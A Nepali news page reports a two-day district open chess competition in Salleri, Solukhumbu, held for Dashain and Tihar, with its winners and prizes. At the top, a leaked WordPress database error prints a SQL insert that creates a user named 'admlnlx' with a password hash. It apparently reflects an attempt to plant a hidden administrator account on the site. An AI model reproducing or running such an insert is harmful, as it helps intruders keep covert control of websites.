WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BPE7UieM2Cvwhb.lVmtI0IVcgFgSjg0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 14:20:44', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । हिन्दु धर्मवालम्बिहरुको चाड वडा दसैँ तथा शुभदिपावलीको अवसरमा जिल्ला समन्वय समिति र जिल्ला खेलकुद विकास समिति सोलुखुम्बुको संयुक्त आयोजना सन्चालित जिल्ला ब्यापी खुला बुद्विचाल प्रतियोगिता सम्पन्न भएको छ ।
बुधबार बाट जिल्लाको सदरमुका सल्लेरिमा सन्चालित प्रतियोगिताको उपाधि क्रमश खरिधन राई, जितेन्द्र कुमार यादव, लवुन राई र बासुदेव राईले प्रथम, द्वितीय र तृतिया स्थान हासिल गरेका छन ।
खरिधन राई थुलुङ दुधकोशिका नि. प्रशासकीय प्रमुख हुन भने जितेन्द्र कुमार यादब माप्य दुधकोशिका नि. प्रशासकिय प्रमुख हुन । त्यस्तै लबुन राई जिल्ला समन्वय समिति सोलुखुम्बुका निमित्त संमन्वय अधिकार हुन भने बासुदेब राई ज.जा. मा.बि.का शिक्षक हुन ।
विहीबार एक कार्यक्रमका वीच जिल्ला समन्वय समितिका प्रमुख कृष्ण प्रसाद निरौलाले उक्त प्रतियोगितामा बिजेतालाई क्रमश नगद २० हजार, १५ हजार र १०/१० हजारको साथमा मेडल र प्रमाणपत्र प्रदान गरे ।
दुई दिनसम्म सन्चालन भएको प्रतियोगितामा जिल्लाका विभिन्न सरकारी कार्यालयका प्रमुख तथा अन्य गरी १४ जनाको सहभागीता रहेको जिल्ला खेलकुद बिकास समितीका कार्यलय प्रमुख नेत्र घिमिरेले बताए ।